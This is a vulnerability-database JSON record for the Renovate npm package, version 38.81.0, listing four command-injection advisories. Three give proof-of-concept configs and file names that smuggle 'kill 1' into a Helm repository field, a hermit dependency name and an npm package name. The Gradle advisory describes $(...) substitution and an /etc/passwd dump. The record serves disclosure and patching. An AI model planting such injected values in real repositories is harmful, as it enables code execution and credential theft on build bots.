{"url":"http://public2.vulnerablecode.io/api/packages/899337?format=json","purl":"pkg:npm/renovate@38.81.0","type":"npm","namespace":"","name":"renovate","version":"38.81.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"42.96.3","latest_non_vulnerable_version":"43.102.11","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18513?format=json","vulnerability_id":"VCID-cqbc-m5e2-tfaj","summary":"Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file\n### Summary\nThe user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `Chart.yaml` in conjunction with a tweaked Renovate configuration file to trick Renovate into executing arbitrary code.\nThe values for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.\n\n### PoC\n1. 
Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  // Register any credentials to make the manager attempt to use basic auth for the Helm registry\n  hostRules: [\n    {\n      matchHost: \"charts.bitnami.com\",\n      username: \"un\",\n      password: \"pw\",\n    },\n  ],\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"helmv3\"],\n      // Don't consult the actual bitnami repo\n      registryUrls: [],\n      // But still, trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`Chart.yaml`:\n\n```yaml\napiVersion: v2\nname: renovate-aci-1\nversion: 0.0.1\ndependencies:\n  - name: redis\n    version: 0.1.0\n    repository: oci://charts.bitnami.com/bitnami || kill 1\n\n```\n\n\n`Chart.lock`:\n\n```yaml\ndependencies:\n- name: redis\n  repository: oci://charts.bitnami.com/bitnami\n```\n\n2. Run Renovate against the repo from a Docker container. 
Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.\n\n### Impact\nThis is an Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg"},{"reference_url":"https://github.com/advisories/GHSA-3f44-xw83-3pmg","reference_id":"GHSA-3f44-xw83-3pmg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3f44-xw83-3pmg"}],"fixed_packages":[{"url":"http:/
/public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-3f44-xw83-3pmg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cqbc-m5e2-tfaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19078?format=json","vulnerability_id":"VCID-e5zm-81zq-9kba","summary":"Renovate vulnerable to arbitrary command injection via Gradle Wrapper and malicious `distributionUrl`\n### Summary\nRenovate can be tricked into executing shell code while updating the Gradle Wrapper. A malicious `distributionUrl` in `gradle/wrapper/gradle-wrapper.properties` can lead to command execution in the Renovate runtime.\n\n### Details\nWhen Renovate handles Gradle Wrapper artifacts, it may run a wrapper update command such as:\n- `./gradlew :wrapper --gradle-distribution-url <value>`\n\nIn the observed behavior, Renovate executes this via a shell (e.g., `/bin/sh -c ...`).  
\nIf `distributionUrl` contains shell command substitution syntax like `$(...)`, the shell evaluates it **before** Gradle validates/parses the URL.\n\nAfter that, Gradle attempts to parse the URL as a URI and fails with `URISyntaxException`, but the shell substitution has already executed.\n\nThis is reproducible even when `allowScripts` is disabled (default is OFF), because this execution happens as part of Gradle Wrapper artifact handling rather than “repository install scripts”.\n\nPrerequisites / attack conditions:\n- The attacker must be able to get a malicious `gradle-wrapper.properties` into a repository that Renovate scans (e.g., direct write access, or a maintainer merges an attacker’s change/PR).\n- Renovate must be configured to process Gradle Wrapper updates/artifacts for that repository (default behavior for the Gradle Wrapper manager).\n\n### PoC\n1. Create a repository with a Gradle Wrapper (`gradlew`, `gradlew.bat`, `gradle/wrapper/gradle-wrapper.jar`, and `gradle/wrapper/gradle-wrapper.properties`).\n2. Set `distributionUrl` in `gradle-wrapper.properties` to include `$(...)`.\n3. Run Renovate against the repository.\n4. Observe that a file is created during Renovate’s wrapper update step **before** Gradle fails with `URISyntaxException`.\n\nA [screen recording](https://drive.google.com/file/d/1nveSCgyz4pKPCZuelqDD_xGEO00DXr4P/view) is attached showing end-to-end reproduction. In the demo, the payload creates `/tmp/passwd_dump` containing `/etc/passwd`, demonstrating that file read/exfiltration is possible within the Renovate execution context.\n\n### Impact\nThis allows arbitrary command execution in the Renovate runtime during Gradle Wrapper updates. 
Depending on deployment, this may expose credentials/tokens available to the bot and may allow an attacker to modify repositories or access internal resources reachable from the Renovate environment.\n\n### Remediation\n\nUpgrading to Renovate [42.68.5](https://github.com/renovatebot/renovate/releases/tag/42.68.5) (2025-12-31) fixes this issue, and closes out other risks of shell evaluation for commands run by Renovate.\n\nIf using the `composer`, `yarn` (v1) or `flux` managers, please upgrade to [42.74.5](https://github.com/renovatebot/renovate/releases/tag/42.74.5) (2026-01-08), as there were follow-up fixes to keep these managers working.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/releases/tag/42.68.5","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/releases/tag/42.68.5"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-pfq2-hh62-7m96"},{"reference_url":"https://github.com/advisories/GHSA-pfq2-hh62-7m96","reference_id":"GHSA-pfq2-hh62-7m96
","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pfq2-hh62-7m96"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/54603?format=json","purl":"pkg:npm/renovate@42.68.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-zk8k-vkvs-9ufs"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@42.68.5"}],"aliases":["GHSA-pfq2-hh62-7m96"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e5zm-81zq-9kba"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19180?format=json","vulnerability_id":"VCID-erkn-fu4w-zygm","summary":"Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies\n### Summary\nThe user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously named hermit dependency in conjunction with a tweaked Renovate configuration file to trick Renovate into executing arbitrary code.\nAll values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.\nIn version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function 
from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.\nWhen support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"hermit\"],\n      // Trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`bin/hermit`:\n\n```bash\n#!/bin/bash\n#\n# THIS FILE IS GENERATED; DO NOT MODIFY\n\nset -eo pipefail\n\nexport HERMIT_USER_HOME=~\n\nif [ -z \"${HERMIT_STATE_DIR}\" ]; then\n  case \"$(uname -s)\" in\n  Darwin)\n    export HERMIT_STATE_DIR=\"${HERMIT_USER_HOME}/Library/Caches/hermit\"\n    ;;\n  Linux)\n    export HERMIT_STATE_DIR=\"${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit\"\n    ;;\n  esac\nfi\n\nexport HERMIT_DIST_URL=\"${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}\"\nHERMIT_CHANNEL=\"$(basename \"${HERMIT_DIST_URL}\")\"\nexport HERMIT_CHANNEL\nexport HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}\n\nif [ ! 
-x \"${HERMIT_EXE}\" ]; then\n  echo \"Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}\" 1>&2\n  INSTALL_SCRIPT=\"$(mktemp)\"\n  # This value must match that of the install script\n  INSTALL_SCRIPT_SHA256=\"09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6\"\n  if [ \"${INSTALL_SCRIPT_SHA256}\" = \"BYPASS\" ]; then\n    curl -fsSL \"${HERMIT_DIST_URL}/install.sh\" -o \"${INSTALL_SCRIPT}\"\n  else\n    # Install script is versioned by its sha256sum value\n    curl -fsSL \"${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh\" -o \"${INSTALL_SCRIPT}\"\n    # Verify install script's sha256sum\n    openssl dgst -sha256 \"${INSTALL_SCRIPT}\" | \\\n      awk -v EXPECTED=\"$INSTALL_SCRIPT_SHA256\" \\\n      '$2!=EXPECTED {print \"Install script sha256 \" $2 \" does not match \" EXPECTED; exit 1}'\n  fi\n  /bin/bash \"${INSTALL_SCRIPT}\" 1>&2\nfi\n\nexec \"${HERMIT_EXE}\" --level=fatal exec \"$0\" -- \"$@\"\n\n```\n\n\n`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):\n\nA symlink to `hermit`\n\n2. Run Renovate against the repo from a Docker container. 
Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.\n\n### Impact\nThis is an Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff"},{"reference_url":"https://github.com/advisories/GHSA-36j9-mx87-2cff","reference_id":"GHSA-36j9-mx87-2cff","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-36j9-mx87-2cff"}],"fixed_packages":[{"url":"http:/
/public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-36j9-mx87-2cff"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-erkn-fu4w-zygm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19076?format=json","vulnerability_id":"VCID-uaf4-6678-xke8","summary":"Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration\n### Summary\nThe user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.\n\n\n### Details\nAdversaries can provide a maliciously crafted Renovate configuration file to trick Renovate into executing arbitrary code.\nThe user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27 of 2023.\n\n### PoC\n1. 
Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"11.1.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"npm\"],\n      // Provide a command in the package name\n      overridePackageName: \"; kill 1; echo \",\n      // Override the datasource to prevent a lookup failure\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`package.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"dependencies\": {\n    \"uuid\": \"^11.0.0\"\n  }\n}\n```\n\n\n`package-lock.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"lockfileVersion\": 3,\n  \"requires\": true,\n  \"packages\": {\n    \"\": {\n      \"name\": \"renovate-aci-4\",\n      \"version\": \"0.0.1\",\n      \"dependencies\": {\n        \"uuid\": \"^11.0.0\"\n      }\n    },\n    \"node_modules/uuid\": {\n      \"version\": \"11.0.0\",\n      \"resolved\": \"https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz\",\n      \"integrity\": \"sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==\",\n      \"funding\": [\n        \"https://github.com/sponsors/broofa\",\n        \"https://github.com/sponsors/ctavan\"\n      ],\n      \"license\": \"MIT\",\n      \"bin\": {\n        \"uuid\": \"dist/esm/bin/uuid\"\n      }\n    }\n  }\n}\n\n```\n\n2. Run Renovate against the repo from a Docker container. 
Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.\n\n### Impact\nThis is an Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.","references":[{"reference_url":"https://github.com/renovatebot/renovate","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate"},{"reference_url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj"},{"reference_url":"https://github.com/advisories/GHSA-fr4j-65pv-gjjj","reference_id":"GHSA-fr4j-65pv-gjjj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr4j-65pv-gjjj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/52886?format=json","purl":"pkg:npm/renovate@40.33.0","is_vulnerable":
true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-e5zm-81zq-9kba"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@40.33.0"}],"aliases":["GHSA-fr4j-65pv-gjjj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uaf4-6678-xke8"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/renovate@38.81.0"}